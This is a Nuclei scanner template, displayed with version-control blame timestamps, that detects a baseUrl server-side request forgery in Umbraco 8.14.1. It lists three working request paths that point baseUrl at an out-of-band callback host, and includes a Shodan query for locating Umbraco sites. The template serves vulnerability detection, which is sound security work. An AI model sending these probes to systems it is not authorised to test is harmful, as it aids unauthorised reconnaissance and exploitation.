2021-10-30 05:33:14 +00:00
|
|
|
id: umbraco-base-ssrf
|
|
|
|
|
|
|
|
info:
|
2022-08-05 13:57:51 +00:00
|
|
|
name: Umbraco 8.14.1 - baseUrl Server-Side Request Forgery (SSRF)
|
2021-10-30 05:33:14 +00:00
|
|
|
author: dhiyaneshDk
|
|
|
|
severity: medium
|
2022-08-05 13:57:51 +00:00
|
|
|
description: Umbraco 8.1.4.1 allows attackers to use the baseUrl parameter to several programs to perform a server-side request forgery (SSRF) attack.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/50462
|
2021-10-30 05:33:14 +00:00
|
|
|
classification:
|
2022-08-05 13:57:51 +00:00
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
|
|
|
|
cvss-score: 6.8
|
|
|
|
cwe-id: CWE-918
|
2022-07-05 02:53:51 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 3
|
2022-07-05 02:53:51 +00:00
|
|
|
verified: true
|
|
|
|
shodan-query: http.html:"Umbraco"
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: oast,edb,ssrf,umbraco
|
2021-10-30 05:33:14 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-10-30 05:33:14 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=http://{{interactsh-url}}'
|
|
|
|
- '{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=http://{{interactsh-url}}/'
|
|
|
|
- '{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http://{{interactsh-url}}/'
|
|
|
|
|
|
|
|
stop-at-first-match: true
|
2022-07-05 02:53:51 +00:00
|
|
|
req-condition: true
|
|
|
|
matchers-condition: and
|
2021-10-30 05:33:14 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
|
|
words:
|
|
|
|
- "http"
|
2022-07-05 02:53:51 +00:00
|
|
|
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- "len(body_1)==0"
|
|
|
|
- "len(body_2)==0"
|
|
|
|
- "len(body_3)==0"
|
2022-08-05 13:57:51 +00:00
|
|
|
|
|
|
|
# Enhanced by cs 08/03/2022
|